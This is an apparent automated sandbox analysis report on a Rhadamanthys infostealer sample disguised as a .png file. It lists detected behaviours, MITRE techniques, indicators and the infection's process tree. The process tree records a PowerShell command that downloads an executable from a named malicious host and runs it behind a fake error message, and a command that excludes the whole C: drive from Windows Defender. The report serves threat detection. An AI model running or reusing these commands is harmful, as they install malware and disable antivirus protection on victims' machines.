rhadamanthys | 10d18771311ea3d32128642debc3a5e7bfdbfa0982e0805558a87ef2497c5fb4

Resubmissions

05/08/2024, 22:15

240805-16c9xstgka 10

05/08/2024, 22:10

240805-13nw9azfjj 10

Analysis

max time kernel
629s
max time network
630s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
05/08/2024, 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

миимссми.png
Size

932KB
MD5

c884fc194231c9b1ea1b3174a4a5d245
SHA1

ed5205b51b632191559f481f20944ebaa7cec4ad
SHA256

10d18771311ea3d32128642debc3a5e7bfdbfa0982e0805558a87ef2497c5fb4
SHA512

c22fc6fea39b9185394a64b32e0b6fcba677e9715390bb96eaac3a8a037d99252eaef9b6757cd6a771d4295ecee17e9aea6037169b5257004930b13621c73ae6
SSDEEP

24576:nUKqVB0thWSrltKGDWVSHd14F0AIAwPWTRawTS5z+2:UKyBcjEoHd5/AwOT/cj

Score

10^/10

rhadamanthys defense_evasion discovery execution stealer

Malware Config

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 2328 created 1812	2328	BitLockerToGo.exe	49
PID 3448 created 1812	3448	BitLockerToGo.exe	49
PID 2224 created 1812	2224	BitLockerToGo.exe	49
PID 6044 created 1812	6044	BitLockerToGo.exe	49
PID 2012 created 1812	2012	BitLockerToGo.exe	49

Blocklisted process makes network request 6 IoCs

flow	pid	Process
48	5420	powershell.exe
56	5744	powershell.exe
100	1608	powershell.exe
102	1608	powershell.exe
105	1608	powershell.exe
116	5944	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1052	powershell.exe
5808	powershell.exe
4824	powershell.exe
1608	powershell.exe
5944	powershell.exe
5420	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 10 IoCs

pid	Process
5808	~.exe
5220	Install_x64.exe
1044	1.exe
5344	1.exe
5444	3.exe
5856	Install_x64.exe
5960	1.exe
5352	1.exe
5584	3.exe
440	Install_x64.exe

Loads dropped DLL 11 IoCs

pid	Process
5220	Install_x64.exe
5220	Install_x64.exe
5220	Install_x64.exe
5220	Install_x64.exe
5856	Install_x64.exe
5856	Install_x64.exe
5856	Install_x64.exe
5856	Install_x64.exe
440	Install_x64.exe
440	Install_x64.exe
440	Install_x64.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
101	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 5808 set thread context of 2328	5808	~.exe	114
PID 1044 set thread context of 3448	1044	1.exe	131
PID 5344 set thread context of 2224	5344	1.exe	141
PID 5444 set thread context of 3828	5444	3.exe	147
PID 5960 set thread context of 6044	5960	1.exe	163
PID 5352 set thread context of 2012	5352	1.exe	171
PID 5584 set thread context of 4388	5584	3.exe	177

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File created	C:\Program Files\launcher289\1.exe	Install_x64.exe
File created	C:\Program Files\launcher289\2.exe	Install_x64.exe
File created	C:\Program Files\launcher289\3.exe	Install_x64.exe
File created	C:\Program Files\launcher289\1.exe	Install_x64.exe
File created	C:\Program Files\launcher289\2.exe	Install_x64.exe
File created	C:\Program Files\launcher289\3.exe	Install_x64.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\Install_x64.exe:Zone.Identifier	firefox.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 10 IoCs

pid	pid_target	Process	procid_target
3492	2328	WerFault.exe	114
5208	2328	WerFault.exe	114
3960	3448	WerFault.exe	131
3432	3448	WerFault.exe	131
5944	2224	WerFault.exe	141
2580	2224	WerFault.exe	141
1932	6044	WerFault.exe	163
1400	6044	WerFault.exe	163
4980	2012	WerFault.exe	171
3432	2012	WerFault.exe	171

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	openwith.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1735401866-3802634615-1355934272-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Install_x64.exe:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
5420	powershell.exe
5420	powershell.exe
5420	powershell.exe
5744	powershell.exe
5744	powershell.exe
5744	powershell.exe
1072	powershell.exe
1072	powershell.exe
1072	powershell.exe
2328	BitLockerToGo.exe
2328	BitLockerToGo.exe
2876	openwith.exe
2876	openwith.exe
2876	openwith.exe
2876	openwith.exe
1052	powershell.exe
1052	powershell.exe
1052	powershell.exe
3448	BitLockerToGo.exe
3448	BitLockerToGo.exe
4728	openwith.exe
4728	openwith.exe
4728	openwith.exe
4728	openwith.exe
2224	BitLockerToGo.exe
2224	BitLockerToGo.exe
3976	openwith.exe
3976	openwith.exe
3976	openwith.exe
3976	openwith.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
5808	powershell.exe
5808	powershell.exe
5808	powershell.exe
6044	BitLockerToGo.exe
6044	BitLockerToGo.exe
968	openwith.exe
968	openwith.exe
968	openwith.exe
968	openwith.exe
2012	BitLockerToGo.exe
2012	BitLockerToGo.exe
6028	openwith.exe
6028	openwith.exe
6028	openwith.exe
6028	openwith.exe
5944	powershell.exe
5944	powershell.exe
5944	powershell.exe
4824	powershell.exe
4824	powershell.exe
4824	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	4892	firefox.exe
Token: SeDebugPrivilege	4892	firefox.exe
Token: SeDebugPrivilege	5420	powershell.exe
Token: SeDebugPrivilege	5744	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	4892	firefox.exe
Token: SeDebugPrivilege	4892	firefox.exe
Token: SeDebugPrivilege	4892	firefox.exe
Token: SeDebugPrivilege	4892	firefox.exe
Token: SeDebugPrivilege	4892	firefox.exe
Token: SeDebugPrivilege	5220	Install_x64.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	2864	whoami.exe
Token: SeDebugPrivilege	5856	Install_x64.exe
Token: SeDebugPrivilege	4892	firefox.exe
Token: SeDebugPrivilege	5808	powershell.exe
Token: SeDebugPrivilege	5944	powershell.exe
Token: SeDebugPrivilege	440	Install_x64.exe
Token: SeDebugPrivilege	4892	firefox.exe
Token: SeDebugPrivilege	4824	powershell.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe

Suspicious use of SetWindowsHookEx 27 IoCs

pid	Process
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
1488	MiniSearchHost.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
4892	firefox.exe
5220	Install_x64.exe
3448	BitLockerToGo.exe
2224	BitLockerToGo.exe
5856	Install_x64.exe
6044	BitLockerToGo.exe
2012	BitLockerToGo.exe
440	Install_x64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 352 wrote to memory of 4892	352	firefox.exe	84
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 2436	4892	firefox.exe	85
PID 4892 wrote to memory of 4176	4892	firefox.exe	86
PID 4892 wrote to memory of 4176	4892	firefox.exe	86
PID 4892 wrote to memory of 4176	4892	firefox.exe	86
PID 4892 wrote to memory of 4176	4892	firefox.exe	86
PID 4892 wrote to memory of 4176	4892	firefox.exe	86
PID 4892 wrote to memory of 4176	4892	firefox.exe	86
PID 4892 wrote to memory of 4176	4892	firefox.exe	86
PID 4892 wrote to memory of 4176	4892	firefox.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:1812
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2876
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4728
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3976
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:968
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:6028

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\миимссми.png
1⤵
PID:4424

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:352
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4892
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1936 -parentBuildID 20240401114208 -prefsHandle 1852 -prefMapHandle 1844 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3f52bed-507c-4a91-9ef4-d17a2715fc33} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" gpu
    3⤵
    PID:2436
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20240401114208 -prefsHandle 2320 -prefMapHandle 2308 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c5f4f43-c926-4a66-9dca-e5f00efb483d} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" socket
    3⤵
    PID:4176
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3040 -childID 1 -isForBrowser -prefsHandle 2928 -prefMapHandle 3064 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e37dec9c-9f5f-40c1-804b-62ea50eecc30} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:1652
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3560 -childID 2 -isForBrowser -prefsHandle 3552 -prefMapHandle 3596 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe8fdd48-5cad-4dc5-b390-b2b792d7d27c} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:5520
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4340 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4060 -prefMapHandle 4320 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0efbabb-ad94-4eee-a459-2dc19cb877ca} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" utility
    3⤵
    - Checks processor information in registry
    PID:5096
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2700 -childID 3 -isForBrowser -prefsHandle 1364 -prefMapHandle 1404 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b28db1a7-c424-4e6d-9814-444fbf1e43db} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:1780
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5428 -childID 4 -isForBrowser -prefsHandle 5444 -prefMapHandle 5452 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfe92369-d4d3-479d-a0f2-7a2e7d6f816b} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:2296
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5684 -childID 5 -isForBrowser -prefsHandle 5848 -prefMapHandle 5844 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed92c751-33f0-441c-8a4c-5481bd78fa7e} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:4840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6020 -childID 6 -isForBrowser -prefsHandle 4228 -prefMapHandle 4240 -prefsLen 28040 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {62668e78-f746-4fd1-8da6-ced55537a98b} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:1356
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5808 -childID 7 -isForBrowser -prefsHandle 5800 -prefMapHandle 5796 -prefsLen 28040 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9854d94c-70c7-44de-93b8-852e8e41ab0d} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:1560
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6544 -childID 8 -isForBrowser -prefsHandle 6536 -prefMapHandle 6532 -prefsLen 28284 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b3dd705-7962-4a22-988b-a447984d6da8} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:1176
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5856 -childID 9 -isForBrowser -prefsHandle 5936 -prefMapHandle 5952 -prefsLen 28284 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6a5fa64-5f53-484c-8987-38d595ed4831} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:3336
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7404 -childID 10 -isForBrowser -prefsHandle 7452 -prefMapHandle 7448 -prefsLen 28324 -prefMapSize 244658 -jsInitHandle 1084 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab72c648-8ede-485d-92be-85b6136bb21a} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" tab
    3⤵
    PID:2324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:5064
- C:\Windows\system32\cmd.exe
  cmd /c start /min powershell.exe $path='C:\Users\Admin\AppData\Local\Temp\~.exe';iwr https://mickbiz.com/1.exe -outfile $path; start-process $path; msg * Unknown error!
  2⤵
  PID:3220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe $path='C:\Users\Admin\AppData\Local\Temp\~.exe';iwr https://mickbiz.com/1.exe -outfile $path; start-process $path; msg * Unknown error!
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5420
  - - C:\Users\Admin\AppData\Local\Temp\~.exe
      "C:\Users\Admin\AppData\Local\Temp\~.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5808
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2328
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2328 -s 504
        6⤵
        Program crash
        
        PID:3492
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2328 -s 512
        6⤵
        Program crash
        
        PID:5208
  - - C:\Windows\system32\msg.exe
      "C:\Windows\system32\msg.exe" * Unknown error!
      4⤵
      PID:4288

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1488

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:5692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5744
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start /min powershell.exe =%tmp%\~.exe
  2⤵
  PID:5200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe =C:\Users\Admin\AppData\Local\Temp\~.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2328 -ip 2328
1⤵
PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2328 -ip 2328
1⤵
PID:3704

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5804

C:\Users\Admin\Downloads\Install_x64.exe
"C:\Users\Admin\Downloads\Install_x64.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1052
- C:\Program Files\launcher289\1.exe
  "C:\Program Files\launcher289\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1044
